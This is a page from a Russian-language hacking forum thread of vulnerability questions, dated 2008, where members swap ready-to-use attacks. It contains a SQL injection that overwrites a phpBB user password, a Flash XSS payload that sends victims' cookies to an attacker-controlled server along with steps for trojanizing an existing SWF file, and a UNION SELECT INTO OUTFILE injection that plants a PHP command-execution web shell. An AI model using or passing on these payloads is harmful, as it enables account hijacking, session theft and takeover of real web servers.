HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
Ответ
Страница 220 из 2438 « Первая < 120170210 216 217 218 219 220 221 222 223 224 2302703207201220 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2191  
Старый 30.05.2008, 21:53
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
думаю так:
Цитата:
id=2+or+1=+1;update+phpbb_users+SET+user_newpasswd =char(закодируем)+where+user_id=2/*
но помоему невсегда будет работать..
Последний раз редактировалось sabe; 30.05.2008 в 21:56..
 
Ответить с цитированием

  #2192  
Старый 30.05.2008, 21:58
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
Ничего вы этим не сделаете. Я написал выше.
__________________
..
 
Ответить с цитированием

  #2193  
Старый 30.05.2008, 23:46
+toxa+
[Лишённый самовыражени
Регистрация: 16.01.2005
Сообщений: 1,787
Провел на форуме:
9751379

Репутация: 3812


Отправить сообщение для +toxa+ с помощью ICQ Отправить сообщение для +toxa+ с помощью AIM
По умолчанию
Цитата:
Сообщение от SeeJay  
И еще вопрос (извините, если замучил)…
Насколько я понимаю данный баг надо впихивать через флешку (swf)??

Код:
getURL("javascript:function blab(){}var scriptNode = +document.createElement('script'); document.getElementsByTagName('body')[0].appendChild(scriptNode);scriptNode.language='java  script';scriptNode.src= 'http://www.YourServer/UrPHPpage.php?Cookie='+document.cookie +;blab();");
PHP код:
class hek{
  function hek() {
  }

  static function main(mc) {
    getURL("javascript:alert(document.cookie);");
  }

Далее компилим
Код:
mtasc.exe -swf hek.swf -main -header 1:1:1 hek.as
заливаем куда надо и всё собственно

Можно протроянить уже существующее swf приложение с помощью swfcombine из пака Swftools
Анализируем приложение в которое будем вживлять наш злостный кодес с помощью swfdump
Код:
swfdump.exe hek.swf
компилим с нужными параметрами злобнокодес (а именно меняем флаг -header)
Код:
mtasc.exe -swf hek.swf -main -header x:y:z hek.as
x и y - размеры, z - частота кадров в секунду
и вживляем
Код:
swfcombine.exe -o hek_movie.swf -T hek.swf movie.swf
__________________
 
Ответить с цитированием

  #2194  
Старый 31.05.2008, 04:55
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291

Репутация: 17
По умолчанию
а уязвимости движков на файлах и на базах сильна отличаются?
 
Ответить с цитированием

  #2195  
Старый 31.05.2008, 05:05
xcedz
Познавший АНТИЧАТ
Регистрация: 14.01.2008
Сообщений: 1,165
Провел на форуме:
7229141

Репутация: 3099


По умолчанию
Цитата:
Сообщение от Demetra  
а уязвимости движков на файлах и на базах сильна отличаются?
в чем суть вопроса то?
 
Ответить с цитированием

  #2196  
Старый 31.05.2008, 11:40
.Slip
Leaders of Antichat - Level 4
Регистрация: 16.01.2006
Сообщений: 1,966
Провел на форуме:
21768337

Репутация: 3486


По умолчанию
>> а уязвимости движков на файлах и на базах сильна отличаются?

xss/lfi/rfi/exec - остаются такими же в движках на текстовых файлах. Единственное чего нету это sql-inj.
__________________
..
 
Ответить с цитированием

  #2197  
Старый 31.05.2008, 13:33
Demetra
Познающий
Регистрация: 27.08.2007
Сообщений: 48
Провел на форуме:
91291

Репутация: 17
По умолчанию
ясна,это хорошо
 
Ответить с цитированием

  #2198  
Старый 31.05.2008, 18:40
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию
Подскажите , есть слепок БД одного форума .
Смогу ли я методом INSERT INTO FILE залить туда шелл ?
Если можно с примером , в mysql не силён
Спасибо .
 
Ответить с цитированием

  #2199  
Старый 31.05.2008, 19:11
А®ТеS
Участник форума
Регистрация: 25.11.2006
Сообщений: 291
Провел на форуме:
1537850

Репутация: 536
Отправить сообщение для А®ТеS с помощью ICQ
По умолчанию
Термин "слепок БД" мне не знаком. Могу предположить, что это дамп базы. С дампом ты шелл, конечно, не зальешь. Метода INSERT INTO FILE нету =\. В случае с гипотетической инъекцией, можно сделать так: http://site.ru/?id=-1+UNION+SELECT+1,'<?php system($_GET[cmd]); ?>',3+INTO+OUTFILE+'полный путь до файла'/*. Выполнится, если есть file_priv в mysql.user и magic_quotes_gpc=off.
Последний раз редактировалось А®ТеS; 31.05.2008 в 19:16..
 
Ответить с цитированием

  #2200  
Старый 31.05.2008, 21:14
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
Question
Т.е. имея возможность залить обратно Дамп БД , я не могу залить шел ?
 
Ответить с цитированием
Ответ
Страница 220 из 2438 « Первая < 120170210 216 217 218 219 220 221 222 223 224 2302703207201220 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ